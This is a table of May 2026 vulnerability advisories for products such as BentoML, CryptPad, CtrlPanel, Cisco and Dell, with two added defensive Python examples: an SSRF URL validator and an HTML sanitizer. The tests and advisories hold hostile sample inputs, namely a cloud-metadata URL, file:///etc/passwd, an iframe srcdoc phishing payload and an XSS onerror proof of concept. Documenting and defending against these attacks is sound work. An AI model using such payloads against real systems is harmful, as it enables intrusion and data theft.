| bentoml--BentoML | BentoML is a Python library for building online serving systems optimized for AI apps and model inference. In versions 1.4.38 and prior, the build packaging workflow follows attacker-controlled symlinks inside the build context and copies the referenced file contents into the generated Bento artifact. If a victim builds an untrusted repository or other attacker-supplied build context, the attacker can place a symlink such as loot.txt -> /tmp/outside-marker.txt or a link to a more sensitive local file. When bentoml build runs, BentoML dereferences the symlink and packages the target file contents into the Bento. The leaked file can then propagate further through export, push, or containerization workflows. An attacker can exfiltrate local files from the build host into the Bento artifact, exposing secrets such as cloud credentials, SSH keys, API tokens, environment files, or other sensitive local configurations. Because Bento artifacts are commonly exported, uploaded, stored, or containerized after build, the leaked file contents can spread beyond the original build machine. This issue has been fixed in version 1.4.39. | 2026-05-22 | 5.5 | CVE-2026-40610 | https://github.com/bentoml/BentoML/security/advisories/GHSA-mcfx-4vc6-qgxv https://github.com/bentoml/BentoML/commit/5fb7cd41f92e2a56b45391284cf15b9ac9963a1f https://github.com/bentoml/BentoML/releases/tag/v1.4.39 |
| bestpractical--rt | RT is an open source, enterprise-grade issue and ticket tracking system. Versions prior to 5.0.10 and 6.0.0 through 6.0.2 contain a spreadsheet (CSV/formula) injection vulnerability. User-controlled data in spreadsheet exports is not sanitized before being written to the output file, which can cause spreadsheet applications to interpret crafted values as formulas or macros when the file is opened. This issue has been fixed in versions 5.0.10 and 6.0.3. If developers are unable to upgrade immediately, they can temporarily work around this issue by avoiding opening exported RT spreadsheet files directly in spreadsheet applications when the data may contain untrusted user input. | 2026-05-22 | 4.6 | CVE-2026-41073 | https://github.com/bestpractical/rt/security/advisories/GHSA-6x92-7v65-7m3r https://github.com/bestpractical/rt/releases/tag/rt-5.0.10 https://github.com/bestpractical/rt/releases/tag/rt-6.0.3 |
| bigbluebutton--bigbluebutton | BigBlueButton is an open-source virtual classroom. In versions prior to 3.0.19, the recording playback (presentation format) did not sanitize user input from the public chat. This allowed a malicious actor to craft a targeted XSS attack that fires for anyone replaying the recording. This issue has been fixed in 3.0.19. | 2026-05-18 | 6.5 | CVE-2026-27737 | https://github.com/bigbluebutton/bigbluebutton/security/advisories/GHSA-8vv7-vj94-q2pv https://github.com/bigbluebutton/bbb-playback/commit/09e89bfe4ff8488b68c3ff040d3081e419dc89b1 https://github.com/bigbluebutton/bigbluebutton/commit/69f45aa1b963dc7d80179d0155acc670aec5c4fc https://github.com/bigbluebutton/bigbluebutton/releases/tag/v3.0.19 https://github.com/blindsidenetworks/scalelite/releases/tag/v1.7.0 |
| Brainstorm Force--Presto Player | Missing Authorization vulnerability in Brainstorm Force Presto Player allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Presto Player: from n/a through 4.1.3. | 2026-05-19 | 4.3 | CVE-2026-45442 | https://patchstack.com/database/wordpress/plugin/presto-player/vulnerability/wordpress-presto-player-plugin-4-1-3-broken-access-control-vulnerability?_s_id=cve |
| broadstreetads--Broadstreet | The Broadstreet plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.52.2 via the get_sponsored_meta AJAX action due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to disclose any private post metadata. | 2026-05-21 | 4.3 | CVE-2026-1881 | https://www.wordfence.com/threat-intel/vulnerabilities/id/328ccf8f-797b-4b1a-b0f1-afd8e44f41e6?source=cve https://plugins.trac.wordpress.org/changeset?old_path=%2Fbroadstreet/tags/1.52.2&new_path=%2Fbroadstreet/tags/1.53.2 |
| burlingtonbytes--WP Blockade Visual Page Builder | The WP Blockade plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'shortcode' parameter in all versions up to and including 0.9.14. This is due to insufficient input sanitization and output escaping in the render_shortcode_preview() function. The function receives user input from $_GET['shortcode'], passes it through stripslashes() without any sanitization, and then outputs it directly via echo do_shortcode($shortcode) on line 393. When the input is not a valid WordPress shortcode (e.g., an HTML tag with JavaScript event handlers), do_shortcode() returns it unchanged, and it is reflected into the page without escaping. The endpoint is registered via admin_post_ (not admin_post_nopriv_), meaning it requires the user to be logged in with at minimum a Subscriber-level account. There is no nonce verification or additional capability check. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute if they can successfully trick a user into performing an action such as clicking a link. | 2026-05-22 | 6.1 | CVE-2026-3481 | https://www.wordfence.com/threat-intel/vulnerabilities/id/66950509-ce2a-42fe-a8b2-2a92a1b573c3?source=cve https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.php#L393 https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L393 https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.php#L360 https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L360 |
| calcom--cal.diy | A server-side request forgery vulnerability has been discovered in calcom cal.diy up to 4.9.4 in the function validateUrlForSSRF of the file apps/web/app/api/logo/route.ts (Logo API component). Manipulation of the validated URL results in server-side request forgery. The attack can be launched remotely, but is rated as highly complex and difficult to exploit. An exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond. | 2026-05-23 | 5 | CVE-2026-9304 | VDB-365251; Submit #812176 (cal.com <= v4.9.4 Server-Side Request Forgery, CWE-918); https://gist.github.com/YLChen-007/b3d0b85767b7e346a291933d602fbb3b |
| calcom--cal.diy | An information disclosure vulnerability has been determined in calcom cal.diy up to 4.9.4 in the function getServerSideProps of the file apps/web/modules/bookings/views/bookings-single-view.getServerSideProps.tsx (Generic React API component). Manipulation of the cancelledBy/rescheduledBy argument causes information disclosure. The attack can be initiated remotely. An exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond. | 2026-05-24 | 5.3 | CVE-2026-9349 | VDB-365312; Submit #812177 (cal.com <= v4.9.4 Exposure of Sensitive Information, CWE-200); https://gist.github.com/YLChen-007/b59c44d1550c4b0f373ca4eb1c150994 |
| calcom--cal.diy | A cross-site request forgery vulnerability has been identified in calcom cal.diy up to 4.9.4 in an unknown function. The attack can be initiated remotely. An exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond. | 2026-05-23 | 4.3 | CVE-2026-9303 | VDB-365250; Submit #812173 and duplicate Submit #812175 (cal.com <= v4.9.4 Cross-Site Request Forgery, CWE-352); https://gist.github.com/YLChen-007/26663d9558e15994176dc420d2e11d48 https://gist.github.com/YLChen-007/dafada36e356bc895b09829d8ec57e49 |
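The first cal.diy row (CVE-2026-9304) names a URL validator, validateUrlForSSRF, as the flawed component without saying which check it got wrong. The following is an added example, not cal.com's code, of what such a validator has to do before the server fetches a user-supplied URL; it goes beyond the row by also covering IPv4-mapped IPv6, multicast and credentials in the authority. The function names, the resolver hook and the DNS table are assumptions constructed so that it runs offline.

```python
# Added example (not cal.com's code): the validation an SSRF guard such as
# the one named in CVE-2026-9304 has to perform before the server fetches a
# user-supplied URL.  Function names, the resolver hook and the DNS table
# are assumptions constructed for an offline demonstration.
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def is_public_address(ip):
    """True only for globally routable unicast addresses.

    IPv4-mapped IPv6 (::ffff:10.0.0.5) is unwrapped first; otherwise an
    RFC 1918 target slips through on a dual-stack socket.  Multicast is
    excluded explicitly because ipaddress counts 224/4 as "global".
    """
    addr = ipaddress.ip_address(ip)
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return addr.is_global and not addr.is_multicast


def system_resolver(hostname):
    """Every address the system resolver returns for hostname."""
    return {info[4][0] for info in socket.getaddrinfo(hostname, None)}


def validate_url_for_ssrf(url, resolver=system_resolver):
    """Return (ok, reason) for a URL the server is about to fetch.

    Rejects non-http(s) schemes, credentials in the authority (a classic
    way to hide the real host), missing hosts, and any host with at least
    one non-public address.  IP literals go through the resolver as well,
    so with the system resolver shorthand such as decimal 2130706433 comes
    back as 127.0.0.1 and is rejected like any other loopback address.
    """
    try:
        parts = urlsplit(url)
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addresses = resolver(host)
    except OSError as exc:  # socket.gaierror is an OSError
        return False, f"resolution failed: {exc}"
    if not addresses:
        return False, "host resolved to no addresses"
    for ip in addresses:
        try:
            public = is_public_address(ip)
        except ValueError:
            return False, f"unexpected resolver result {ip!r}"
        if not public:
            return False, f"{host} resolves to non-public {ip}"
    return True, "ok"


# Constructed DNS table so the demonstration runs without network access.
CONSTRUCTED_DNS = {
    "cdn.example": {"93.184.216.34"},
    "rebind.example": {"93.184.216.34", "10.0.0.5"},  # one public, one internal
    "metadata": {"169.254.169.254"},
}


def constructed_resolver(hostname):
    """Mimic getaddrinfo: table lookup, else accept an IP literal."""
    if hostname in CONSTRUCTED_DNS:
        return set(CONSTRUCTED_DNS[hostname])
    try:
        return {str(ipaddress.ip_address(hostname))}
    except ValueError:
        raise socket.gaierror(f"constructed resolver: unknown host {hostname!r}") from None


if __name__ == "__main__":
    for candidate in ("https://cdn.example/logo.png", "https://rebind.example/",
                      "http://metadata/latest/meta-data/", "http://[::ffff:127.0.0.1]/",
                      "file:///etc/passwd", "http://cdn.example@metadata/"):
        print(candidate, validate_url_for_ssrf(candidate, constructed_resolver))
```

Validation alone does not close DNS rebinding: the fetch must connect to the address that was validated (or re-validate at connect time), and every redirect hop must be validated again before it is followed.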
| Cisco--Cisco NX-OS Software | A vulnerability in the Border Gateway Protocol (BGP) enforce-first-as feature of Cisco Nexus 3000 Series Switches and Cisco Nexus 9000 Series Switches in standalone NX-OS mode could allow an unauthenticated, remote attacker to trigger BGP peer flaps, resulting in a denial of service (DoS) condition. This vulnerability is due to incorrect parsing of a transitive BGP attribute. An attacker could exploit this vulnerability by sending a crafted BGP update through an established BGP peer session. If the update propagates to an affected device, it could cause the device to drop the BGP session and flap with the BGP peer that is forwarding this update, resulting in a DoS condition. | 2026-05-20 | 6.8 | CVE-2026-20171 | cisco-sa-bgp-iefab-3hb2pwtx |
| Cisco--Cisco ThousandEyes Enterprise Agent | A vulnerability in the BrowserBot component of Cisco ThousandEyes Enterprise Agent could have allowed an authenticated, remote attacker to execute arbitrary commands on Agents on behalf of the BrowserBot synthetics orchestration process. Cisco has addressed this vulnerability in the Cisco ThousandEyes Enterprise Agent, and no customer action is needed. This vulnerability was due to insufficient input validation of command arguments that are supplied by the user. Prior to this vulnerability being addressed, an attacker could have exploited this vulnerability by authenticating to the ThousandEyes SaaS and submitting crafted input into the affected parameter. A successful exploit could have allowed the attacker to execute arbitrary commands within the BrowserBot container as the node user. To exploit this vulnerability, the attacker must have valid user credentials for the ThousandEyes SaaS and the ability to manage transaction tests. | 2026-05-20 | 6.3 | CVE-2026-20206 | cisco-sa-tebbot-cmdinj-wN3yQ5gn |
| Cisco--Cisco ThousandEyes Enterprise Agent | A vulnerability in the SSL certificate handling of Cisco ThousandEyes Virtual Appliance could allow an authenticated, remote attacker to execute commands on the underlying operating system as the root user. This vulnerability is due to insufficient validation of user-supplied input. An authenticated attacker could exploit this vulnerability by uploading a crafted certificate to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit this vulnerability, the attacker must have valid administrative credentials. | 2026-05-20 | 4.7 | CVE-2026-20199 | cisco-sa-tevacert-rce-RMJVEym5 |
| conoha--TypeSquare Webfonts for ConoHa | The TypeSquare Webfonts for ConoHa plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.0.4. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify the plugin's site-wide font settings, including the typesquare_auth option (fontThemeUseType), show_post_form, and typesquare_fonttheme, by submitting a POST request to any wp-admin page. For fontThemeUseType values 1 and 3, no nonce verification is performed either, meaning those branches are additionally exploitable via cross-site request forgery. | 2026-05-20 | 4.3 | CVE-2026-8610 | https://www.wordfence.com/threat-intel/vulnerabilities/id/88002a25-6890-4f8b-8a11-239b59d56672?source=cve https://plugins.trac.wordpress.org/browser/ts-webfonts-for-conoha/tags/2.0.4/typesquare-admin.php#L93 https://plugins.trac.wordpress.org/browser/ts-webfonts-for-conoha/tags/2.0.4/inc/class/class.auth.php#L51 https://plugins.trac.wordpress.org/browser/ts-webfonts-for-conoha/tags/2.0.4/typesquare-admin.php#L25 |
| cryptpad--cryptpad | CryptPad is an end-to-end encrypted collaborative office suite. In versions prior to 2026.2.0, the HTML sanitizer in Diffmarked.js can be bypassed due to incomplete attribute filtering on restricted tags. The sanitizer validates only the src attribute of <iframe>, <video>, and <audio> elements, leaving all other attributes unchecked. As a result, an attacker can inject arbitrary HTML through srcdoc, completely defeating CryptPad's intended bounce sandboxing and enabling link injection or other interactive content within user-controlled documents. The root cause lies in how the sanitizer classifies and enforces tag restrictions: although it defines both forbidden and restricted tag lists, <iframe> is treated as "restricted" rather than "forbidden." Enforcement then inspects only the src attribute, so pairing a benign blob: src with a malicious srcdoc results in unrestricted rendering. This issue has been fixed in version 2026.2.0. | 2026-05-20 | 6.1 | CVE-2026-26028 | https://github.com/cryptpad/cryptpad/security/advisories/GHSA-g2g4-47gv-p72v https://github.com/cryptpad/cryptpad/releases/tag/2026.2.0 |
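The CryptPad row describes a sanitizer that inspects only src on a restricted tag and so lets srcdoc through. The following is an added example, not CryptPad's Diffmarked.js, that implements both policies on the same parser: strict_attributes=False reproduces the src-only check, strict_attributes=True allowlists every attribute of a restricted tag. The tag lists, the blob: requirement and the URL-scheme rule are assumptions modelled on the advisory, and the payload is constructed.

```python
# Added example (not CryptPad's Diffmarked.js): an HTML sanitizer that
# checks only the src attribute of a restricted tag beside one that
# allowlists every attribute.  The tag lists, the blob: requirement and the
# policies are assumptions modelled on the advisory, not CryptPad's code.
from html import escape
from html.parser import HTMLParser

FORBIDDEN_TAGS = {"script", "style", "object", "embed", "meta", "link"}
# Restricted tags: src must be a blob: URL and, under the strict policy,
# no attribute outside this set may be present.
RESTRICTED_TAGS = {
    "iframe": {"src", "width", "height", "sandbox"},
    "video": {"src", "controls", "width", "height"},
    "audio": {"src", "controls"},
}
VOID_TAGS = {"br", "hr", "img", "input"}
SAFE_URL_SCHEMES = ("http:", "https:", "mailto:", "blob:")


def url_is_safe(value):
    """Relative URLs and allowlisted schemes only; blocks javascript: etc."""
    v = value.strip().lower()
    return ":" not in v.split("/", 1)[0] or v.startswith(SAFE_URL_SCHEMES)


class Sanitizer(HTMLParser):
    """Re-emit HTML, dropping forbidden elements and policing restricted ones."""

    def __init__(self, strict_attributes):
        super().__init__(convert_charrefs=True)
        self.strict_attributes = strict_attributes
        self.out = []
        self.skip_depth = 0  # > 0 while inside an element being dropped

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag not in VOID_TAGS:
                self.skip_depth += 1
            return
        attrs = dict(attrs)
        if tag in FORBIDDEN_TAGS:
            self.skip_depth = 1
            return
        if tag in RESTRICTED_TAGS:
            src = attrs.get("src")
            if src is None or not src.strip().lower().startswith("blob:"):
                self.skip_depth = 1  # both policies check src ...
                return
            if self.strict_attributes and set(attrs) - RESTRICTED_TAGS[tag]:
                self.skip_depth = 1  # ... only the strict one rejects srcdoc
                return
        else:
            # Ordinary tags: strip event handlers and unsafe URL schemes.
            attrs = {k: v for k, v in attrs.items()
                     if not k.startswith("on")
                     and (k not in ("href", "src") or (v and url_is_safe(v)))}
        self.out.append(self._render(tag, attrs))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <br/> is a start, never an end

    def handle_endtag(self, tag):
        if tag in VOID_TAGS:
            return
        if self.skip_depth:
            self.skip_depth -= 1
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    @staticmethod
    def _render(tag, attrs):
        parts = [tag] + [name if value is None else f'{name}="{escape(value, quote=True)}"'
                         for name, value in attrs.items()]
        return "<" + " ".join(parts) + ">"


def sanitize(html, strict_attributes=True):
    """strict_attributes=False reproduces the 'check only src' mistake."""
    parser = Sanitizer(strict_attributes)
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


# Constructed payload: a benign blob: src paired with a malicious srcdoc.
PAYLOAD = ('<iframe src="blob:https://pad.example/3f2a" '
           'srcdoc="<a href=https://attacker.example>Update your password</a>">'
           '</iframe>')

if __name__ == "__main__":
    print("src-only policy:", sanitize(PAYLOAD, strict_attributes=False))
    print("strict policy  :", repr(sanitize(PAYLOAD)))
```

The element dropping here is a simple depth counter, so an unterminated dropped element swallows everything after it; a production sanitizer works on a parsed tree. The point the example makes survives that simplification: the unit of policy has to be the whole attribute set of a tag, not one attribute of it.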
| Ctrlpanel-gg--panel | CtrlPanel is open-source billing software for hosting providers. In versions 1.1.1 and prior, the admin settings update endpoint accepted a fully qualified class name directly from user-supplied request input and used it for dynamic static method calls and object instantiation without any allowlist validation, allowing authenticated Remote Code Execution. An authenticated admin-level user could supply an arbitrary class name available in the Composer autoloader, potentially triggering unintended constructor or magic method execution. The update() method reads settings_class directly from the HTTP request and passes it to new $settings_class() and $settings_class::getValidations() without verifying that the provided value corresponds to a legitimate settings class. Because PHP resolves class names against the Composer autoloader at runtime, any autoloadable class in the application or its dependencies could be instantiated. Depending on the classes available in the dependency tree, this can trigger unintended side effects through constructors or magic methods (__construct, __toString, __wakeup), following a PHP object injection / gadget chain pattern. This issue has been fixed in version 1.2.0. | 2026-05-19 | 6.6 | CVE-2026-34216 | https://github.com/Ctrlpanel-gg/panel/security/advisories/GHSA-vcg3-fjrx-rg5q https://github.com/Ctrlpanel-gg/panel/releases/tag/1.2.0 |
| Ctrlpanel-gg--panel | CtrlPanel is open-source billing software for hosting providers. In versions 1.1.1 and prior, multiple admin controllers expose DataTable endpoints without authorization checks, allowing any authenticated user to access sensitive administrative data that should be restricted to administrators only. The affected admin controllers define datatable() methods that are reachable via GET requests but lack any permission or role verification. Because the routes fall under the /admin/ prefix, operators may assume they are protected; however, the middleware applied to this route group does not enforce admin-level authorization on these specific endpoints. As a result, any authenticated user (regardless of role) can query these endpoints and receive paginated JSON responses containing sensitive records. Exploitation can result in enumeration of user PII, payment and transaction records, active voucher and coupon codes, role and permission structure, server ownership mappings and support ticket contents. This issue has been fixed in version 1.2.0. | 2026-05-19 | 6.5 | CVE-2026-34233 | https://github.com/Ctrlpanel-gg/panel/security/advisories/GHSA-mj5g-j7fq-7hc4 https://github.com/Ctrlpanel-gg/panel/releases/tag/1.2.0 |
| Ctrlpanel-gg--panel | CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contain a Stored Cross-Site Scripting (XSS) vulnerability in the admin role management interface. In app/Http/Controllers/Admin/RoleController.php, the datatable() method interpolates $role->name and $role->color directly into a <span> element's HTML and style attribute without sanitization, and the chained .rawColumns(['actions', 'name']) call instructs DataTables to render the name column as raw HTML, bypassing automatic output escaping. An admin with role creation or edit permissions can inject a payload such as <img src=x onerror="alert('XSS_POC')"> into the name or color fields, which is persisted to the database and executes in the browser of every admin who loads the /admin/roles page. This enables session hijacking via cookie theft, credential harvesting through fake login prompts or keyloggers, lateral privilege escalation by performing admin actions on behalf of victims, and a persistent backdoor that re-executes on every page load until the malicious role record is removed. This issue has been resolved in version 1.2.0. | 2026-05-19 | 4.8 | CVE-2026-34246 | https://github.com/Ctrlpanel-gg/panel/security/advisories/GHSA-wpqj-xwhq-2mmh https://github.com/Ctrlpanel-gg/panel/releases/tag/1.2.0 |
| cvmh--Sticky | The Sticky plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `cvmh-sticky` shortcode `readmoretext` attribute in versions up to and including 2.5.6. This is due to insufficient input sanitization and output escaping in the `cvmh_sticky_front_render()` function - the `readmoretext` attribute value is passed through `apply_filters()` and directly concatenated into the HTML output without any escaping function such as `esc_html()`. This makes it possible for authenticated attackers with Contributor-level access and above to inject arbitrary web scripts in pages that will execute whenever a user accesses a page containing the injected shortcode. | 2026-05-20 | 6.4 | CVE-2026-6397 | https://www.wordfence.com/threat-intel/vulnerabilities/id/135783c5-8175-4775-a013-f1e2bef04479?source=cve https://plugins.trac.wordpress.org/browser/sticky/trunk/includes/functions.php#L118 https://plugins.trac.wordpress.org/browser/sticky/tags/2.5.6/includes/functions.php#L118 https://plugins.trac.wordpress.org/browser/sticky/trunk/includes/shortcode.php#L7 https://plugins.trac.wordpress.org/browser/sticky/tags/2.5.6/includes/shortcode.php#L7 |
| dartiss--Draft List | The Draft List plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Draft Post Title in all versions up to, and including, 2.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The unescaped injection path is triggered specifically when the viewing user lacks edit capabilities, meaning payloads embedded in draft post titles via attribute-breakout techniques execute for unauthenticated users and subscribers. | 2026-05-22 | 6.4 | CVE-2026-9104 | https://www.wordfence.com/threat-intel/vulnerabilities/id/07361278-7abb-4d22-a8df-218d3f982483?source=cve https://plugins.trac.wordpress.org/browser/simple-draft-list/tags/2.6.3/inc/create-lists.php#L396 https://plugins.trac.wordpress.org/browser/simple-draft-list/tags/2.6.3/inc/create-lists.php#L305 https://plugins.trac.wordpress.org/browser/simple-draft-list/tags/2.6.3/inc/create-lists.php#L66 https://plugins.trac.wordpress.org/browser/simple-draft-list/tags/2.6.4/inc/create-lists.php#L389 https://plugins.trac.wordpress.org/browser/simple-draft-list/tags/2.6.4/inc/create-lists.php#L391 https://plugins.trac.wordpress.org/browser/simple-draft-list/tags/2.6.4/inc/create-lists.php#L394 |
| Dell--ECS | Dell ECS, versions 3.5 and 3.6, contain an Improper Access Control in the Identity and Access Management (IAM) module. A remote unauthenticated attacker may potentially exploit this vulnerability, leading to gaining read access to unauthorized data. | 2026-05-22 | 5.9 | CVE-2022-31231 | https://dellservices.lightning.force.com/lightning/r/Lightning_Knowledge__kav/ka06P0000004RFTQA2/view |
| Dell--Live Optics | Dell Live Optics Windows and Personal Edition collectors contain an improper certificate validation vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability leading to loss of confidentiality and integrity. | 2026-05-18 | 6.8 | CVE-2026-41119 | https://www.dell.com/support/kbdoc/en-us/000464862/dsa-2026-221-security-update-for-dell-live-optics-collector-ssl-vulnerability |
| Dell--PowerFlex Manager (Appliance) | Dell PowerFlex Manager, versions 4.6.2 and prior, contains an Open Redirect Vulnerability. An unauthenticated attacker could potentially exploit this vulnerability, leading to a targeted application user being redirected to arbitrary web URLs. The vulnerability could be leveraged by attackers to conduct phishing attacks that cause users to divulge sensitive information. | 2026-05-22 | 6.1 | CVE-2025-26483 | https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities |
| Dell--PowerFlex Manager (Appliance) | Dell PowerFlex Manager, versions 4.6.2 and earlier, contains an Incorrect Privilege Assignment vulnerability. A low-privileged attacker with local access could potentially exploit this vulnerability, leading to elevation of privileges. | 2026-05-22 | 5.3 | CVE-2025-32747 | https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities |
| Dell--PowerFlex Manager (Appliance) | Dell PowerFlex Manager, versions 4.6.2 and earlier, contains an Exposure of Information Through Directory Listing vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to information exposure. | 2026-05-22 | 5.3 | CVE-2025-32749 | https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities |
| Dell--PowerFlex Manager (Appliance) | Dell PowerFlex Manager, versions 4.6.2 and earlier, contains an Insecure Storage of Sensitive Information vulnerability. A low-privileged attacker with local access could potentially exploit this vulnerability, leading to unauthorized access to sensitive information. | 2026-05-22 | 5.5 | CVE-2025-32751 | https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities |
| Dell--PowerFlex Manager (Appliance) | Dell PowerFlex Manager, versions 4.6.2 and earlier, contains an Improper Certificate Validation vulnerability. An unauthenticated attacker with adjacent network access could potentially exploit this vulnerability, leading to information tampering. | 2026-05-22 | 4.2 | CVE-2025-32745 | https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities |
| Dell--PowerFlex Manager (Appliance) | Dell PowerFlex Manager, versions 4.6.2 and earlier, contains an Insecure Storage of Sensitive Information vulnerability. An unauthenticated attacker with local access could potentially exploit this vulnerability, leading to unauthorized access to sensitive information. | 2026-05-22 | 4 | CVE-2025-32746 | https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities |
| Dell--SmartFabric Storage Software | Dell SmartFabric Storage Software, versions prior to 1.4.5, contains an Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability. A high-privileged attacker with local access could potentially exploit this vulnerability, leading to filesystem access for the attacker. | 2026-05-20 | 6.4 | CVE-2026-35070 | https://www.dell.com/support/kbdoc/en-us/000466942/dsa-2026-235-security-update-for-dell-networking-smartfabric-storage-software-vulnerabilities |
| Dell--Unisphere for PowerMax | Dell Unisphere for PowerMax vApp, versions prior to 10.0.0.2, contains an authorization bypass vulnerability in the Unisphere for VMAX application running in the vApp. | 2026-05-22 | 6.5 | CVE-2022-34363 | https://dellservices.lightning.force.com/lightning/r/Lightning_Knowledge__kav/ka06P000000xAiKQAU/view |
| Dell--VxRail | Dell VxRail versions before 7.0.200 contain a Plain-text Password Storage Vulnerability in VxRail Manager. A sys-admin user may exploit this vulnerability, leading to the disclosure of certain user credentials. The attacker may be able to use the exposed credentials to access the vulnerable application with privileges of the compromised account. | 2026-05-22 | 6.7 | CVE-2021-21508 | https://dellservices.lightning.force.com/lightning/r/Lightning_Knowledge__kav/ka0Do000000m7VwIAI/view |
| discourse--discourse | Discourse is an open-source discussion platform. In versions prior to 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1, outdated cached AI summaries can leak removed content to anonymous and unprivileged users who cannot regenerate summaries. This issue has been fixed in versions 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1. To work around this issue, restrict summary generation by tightening the allowed groups on the summarization Personas. | 2026-05-19 | 5.3 | CVE-2026-32244 | https://github.com/discourse/discourse/security/advisories/GHSA-hjmg-2mww-vfvx |
| DumbWareio--DumbAssets | DumbAssets through 1.0.11 contains a stored cross-site scripting vulnerability in asset fields including name, description, modelNumber, serialNumber, and tags that are stored without server-side sanitization and rendered using innerHTML without client-side escaping. Attackers can create or update assets with HTML or JavaScript payloads via the asset API endpoints to execute arbitrary scripts in the browsers of users viewing the asset list, and with Content-Security-Policy disabled, the injected scripts can make unrestricted connections to internal network services. | 2026-05-18 | 6.1 | CVE-2026-45231 | https://github.com/DumbWareio/DumbAssets/pull/135 https://www.vulncheck.com/advisories/dumbassets-stored-cross-site-scripting-via-asset-fields |
| eazyserver--Sentence To SEO (keywords, description and tags) | The Sentence To SEO (keywords, description and tags) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the create_admin_page() function. This makes it possible for unauthenticated attackers to inject malicious web scripts and update plugin settings via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-20 | 6.1 | CVE-2026-6391 | https://www.wordfence.com/threat-intel/vulnerabilities/id/add32c06-90d0-466f-b176-aaae55cf03fb?source=cve https://plugins.trac.wordpress.org/browser/sentence-to-seo/trunk/index.php#L75 https://plugins.trac.wordpress.org/browser/sentence-to-seo/tags/1.0/index.php#L75 https://plugins.trac.wordpress.org/browser/sentence-to-seo/trunk/index.php#L81 https://plugins.trac.wordpress.org/browser/sentence-to-seo/tags/1.0/index.php#L81 https://plugins.trac.wordpress.org/browser/sentence-to-seo/trunk/index.php#L87 https://plugins.trac.wordpress.org/browser/sentence-to-seo/tags/1.0/index.php#L87 https://plugins.trac.wordpress.org/browser/sentence-to-seo/trunk/index.php#L50 https://plugins.trac.wordpress.org/browser/sentence-to-seo/tags/1.0/index.php#L50 |
| Edimax--BR-6228NC | A command injection vulnerability was detected in Edimax BR-6228NC 1.22 in the function mp of the file /goform/mp (POST Request Handler component). Manipulation of the command argument results in command injection. The attack may be performed remotely. An exploit is public and may be used. The vendor was contacted early about this disclosure but did not respond. | 2026-05-18 | 6.3 | CVE-2026-8774 | VDB-364399; Submit #811529 (EDIMAX BR6228NC BR-6228NCv2 v1.22 Command Injection); https://lavender-bicycle-a5a.notion.site/EDIMAX-BR6228NC-mp-34b53a41781f80db8aaed24e43ea24b9?source=copy_link |
